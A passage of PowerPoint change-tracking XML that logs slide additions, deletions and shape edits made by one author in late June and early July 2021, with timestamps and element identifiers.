          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{5B9B619E-E5DC-4376-BCE8-41ABC28F6C2F}" dt="2021-07-01T14:18:37.659" v="55" actId="6549"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1674251011" sldId="492"/>
            <ac:spMk id="12" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="add">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{5B9B619E-E5DC-4376-BCE8-41ABC28F6C2F}" dt="2021-06-28T19:39:54.424" v="1"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2416641626" sldId="493"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="add">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{5B9B619E-E5DC-4376-BCE8-41ABC28F6C2F}" dt="2021-06-28T19:39:54.424" v="1"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="311612657" sldId="494"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="add">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{5B9B619E-E5DC-4376-BCE8-41ABC28F6C2F}" dt="2021-06-28T19:39:54.424" v="1"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3933795559" sldId="495"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="add">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{5B9B619E-E5DC-4376-BCE8-41ABC28F6C2F}" dt="2021-06-28T19:39:54.424" v="1"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="684404787" sldId="496"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="add">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{5B9B619E-E5DC-4376-BCE8-41ABC28F6C2F}" dt="2021-06-28T19:39:54.424" v="1"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3211001472" sldId="497"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="add">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{5B9B619E-E5DC-4376-BCE8-41ABC28F6C2F}" dt="2021-06-28T19:39:54.424" v="1"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1035595462" sldId="498"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="add">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{5B9B619E-E5DC-4376-BCE8-41ABC28F6C2F}" dt="2021-06-28T19:39:54.424" v="1"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1984385075" sldId="499"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="add">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{5B9B619E-E5DC-4376-BCE8-41ABC28F6C2F}" dt="2021-06-28T19:39:54.424" v="1"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3318379012" sldId="500"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="add">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{5B9B619E-E5DC-4376-BCE8-41ABC28F6C2F}" dt="2021-06-28T19:39:54.424" v="1"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2125122821" sldId="501"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="add">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{5B9B619E-E5DC-4376-BCE8-41ABC28F6C2F}" dt="2021-06-28T19:39:54.424" v="1"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="198983510" sldId="502"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="add">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{5B9B619E-E5DC-4376-BCE8-41ABC28F6C2F}" dt="2021-06-28T19:39:54.424" v="1"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="686110812" sldId="503"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="add">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{5B9B619E-E5DC-4376-BCE8-41ABC28F6C2F}" dt="2021-06-28T19:39:54.424" v="1"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3430879985" sldId="504"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="add">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{5B9B619E-E5DC-4376-BCE8-41ABC28F6C2F}" dt="2021-06-28T19:39:54.424" v="1"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1270554279" sldId="505"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="add">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{5B9B619E-E5DC-4376-BCE8-41ABC28F6C2F}" dt="2021-06-28T19:39:54.424" v="1"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="951356934" sldId="506"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="add">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{5B9B619E-E5DC-4376-BCE8-41ABC28F6C2F}" dt="2021-06-28T19:39:54.424" v="1"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1385115538" sldId="507"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="add">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{5B9B619E-E5DC-4376-BCE8-41ABC28F6C2F}" dt="2021-06-28T19:39:54.424" v="1"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="494372939" sldId="508"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="add">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{5B9B619E-E5DC-4376-BCE8-41ABC28F6C2F}" dt="2021-06-28T19:39:54.424" v="1"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2058254067" sldId="509"/>
        </pc:sldMkLst>
      </pc:sldChg>
    </pc:docChg>
  </pc:docChgLst>
  <pc:docChgLst>
    <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}"/>
    <pc:docChg chg="undo redo custSel addSld delSld modSld sldOrd">
      <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T14:32:54.680" v="2383" actId="114"/>
      <pc:docMkLst>
        <pc:docMk/>
      </pc:docMkLst>
      <pc:sldChg chg="addSp delSp modSp mod chgLayout">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T00:54:00.122" v="1673" actId="6264"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1325061211" sldId="256"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod ord">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T00:54:00.122" v="1673" actId="6264"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1325061211" sldId="256"/>
            <ac:spMk id="2" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T00:53:59.906" v="1672" actId="6264"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1325061211" sldId="256"/>
            <ac:spMk id="3" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T00:53:59.906" v="1672" actId="6264"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1325061211" sldId="256"/>
            <ac:spMk id="4" creationId="{7270DA90-D6FE-4817-A397-357C521964EF}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod ord">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T00:54:00.122" v="1673" actId="6264"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1325061211" sldId="256"/>
            <ac:spMk id="5" creationId="{48882033-D690-4A32-BCE0-318BF52BC84B}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T00:54:00.122" v="1673" actId="6264"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1325061211" sldId="256"/>
            <ac:spMk id="6" creationId="{FE279FE8-E095-4AD1-A1C6-C05FFE9ED9DC}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod ord">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T00:54:00.122" v="1673" actId="6264"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1325061211" sldId="256"/>
            <ac:spMk id="7" creationId="{F2871076-CFC8-4CD5-BF65-ECB4ACAEF8D8}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-25T22:29:38.709" v="54" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2201572609" sldId="257"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-26T00:55:36.178" v="1173" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="450669007" sldId="258"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="add mod chgLayout">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T00:53:30.358" v="1663" actId="6264"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2789471632" sldId="392"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp add mod modClrScheme chgLayout">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T00:54:00.122" v="1673" actId="6264"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3672303902" sldId="393"/>
        </pc:sldMkLst>
        <pc:spChg chg="add mod ord">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T00:54:00.122" v="1673" actId="6264"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3672303902" sldId="393"/>
            <ac:spMk id="2" creationId="{4DFC9DA3-4DF5-4CDD-A4D5-ABF5F3B6A19C}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del mod ord">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-25T23:56:52.319" v="855" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3672303902" sldId="393"/>
            <ac:spMk id="3" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T00:53:59.906" v="1672" actId="6264"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3672303902" sldId="393"/>
            <ac:spMk id="3" creationId="{3507DC5C-F3FB-4642-B4AE-4880A33EF9EE}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T00:54:00.122" v="1673" actId="6264"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3672303902" sldId="393"/>
            <ac:spMk id="5" creationId="{C786A172-1DBB-4248-816F-8360E8C049B9}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-25T23:56:47.575" v="852" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3672303902" sldId="393"/>
            <ac:spMk id="9" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-25T23:56:43.838" v="851" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3672303902" sldId="393"/>
            <ac:spMk id="11" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-25T23:56:43.838" v="851" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3672303902" sldId="393"/>
            <ac:spMk id="13" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-25T23:56:43.838" v="851" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3672303902" sldId="393"/>
            <ac:spMk id="18" creationId="{1BFE218D-FB3A-4368-96C3-B96769DF124E}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-25T23:56:43.838" v="851" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3672303902" sldId="393"/>
            <ac:spMk id="19" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-26T00:38:38.614" v="913" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3672303902" sldId="393"/>
            <ac:spMk id="20" creationId="{757F14FD-64BA-4DDF-B4D5-245746F36427}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-26T00:38:40.798" v="914" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3672303902" sldId="393"/>
            <ac:spMk id="22" creationId="{C6A14005-6231-4D70-9780-009B13F0E95F}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-26T00:38:34.926" v="912" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3672303902" sldId="393"/>
            <ac:picMk id="4" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-25T23:56:43.838" v="851" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3672303902" sldId="393"/>
            <ac:picMk id="5" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-25T23:56:43.838" v="851" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3672303902" sldId="393"/>
            <ac:picMk id="8" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-25T23:56:43.838" v="851" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3672303902" sldId="393"/>
            <ac:picMk id="10" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-25T23:56:49.222" v="854" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3672303902" sldId="393"/>
            <ac:picMk id="12" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod modCrop">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-26T00:38:33.015" v="911" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3672303902" sldId="393"/>
            <ac:picMk id="16" creationId="{6F0EFB53-6476-4967-842A-513591BADBE5}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:cxnChg chg="del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-25T23:56:48.486" v="853" actId="478"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3672303902" sldId="393"/>
            <ac:cxnSpMk id="7" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
        <pc:cxnChg chg="del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-25T23:56:43.838" v="851" actId="478"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3672303902" sldId="393"/>
            <ac:cxnSpMk id="15" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
        <pc:cxnChg chg="del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-25T23:56:43.838" v="851" actId="478"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3672303902" sldId="393"/>
            <ac:cxnSpMk id="17" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
        <pc:cxnChg chg="del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-25T23:56:43.838" v="851" actId="478"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3672303902" sldId="393"/>
            <ac:cxnSpMk id="21" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp add mod modClrScheme chgLayout">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T00:54:00.122" v="1673" actId="6264"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2467691949" sldId="394"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod ord">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T00:54:00.122" v="1673" actId="6264"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2467691949" sldId="394"/>
            <ac:spMk id="2" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-26T00:40:46.726" v="1039" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2467691949" sldId="394"/>
            <ac:spMk id="3" creationId="{76E1B39B-59AC-4EE1-87FD-39C3199A948A}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T00:53:59.906" v="1672" actId="6264"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2467691949" sldId="394"/>
            <ac:spMk id="4" creationId="{FDBE572F-22D3-45AD-BB83-0839FFD36676}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T00:53:59.906" v="1672" actId="6264"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2467691949" sldId="394"/>
            <ac:spMk id="6" creationId="{DCCBDC01-C63B-404C-8A7A-2499B6D9921C}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T00:54:00.122" v="1673" actId="6264"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2467691949" sldId="394"/>
            <ac:spMk id="7" creationId="{D8C915EB-F20A-424B-BF00-010E7C88E5FF}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod ord">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T00:54:00.122" v="1673" actId="6264"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2467691949" sldId="394"/>
            <ac:spMk id="8" creationId="{A2208B58-0E66-44D6-BA81-6687A0D72552}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T00:54:00.122" v="1673" actId="6264"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2467691949" sldId="394"/>
            <ac:spMk id="9" creationId="{B77186E0-B800-4374-B26A-C7364B884258}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-26T00:40:46.726" v="1039" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2467691949" sldId="394"/>
            <ac:spMk id="12"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14"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17" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-26T00:40:46.726" v="1039" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2467691949" sldId="394"/>
            <ac:spMk id="22" creationId="{16115475-8B62-47B5-80A6-1F1F393306CC}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-26T00:40:46.726" v="1039" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2467691949" sldId="394"/>
            <ac:spMk id="29"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34"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35" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-26T00:40:46.726" v="1039" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2467691949" sldId="394"/>
            <ac:spMk id="36" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="mod">
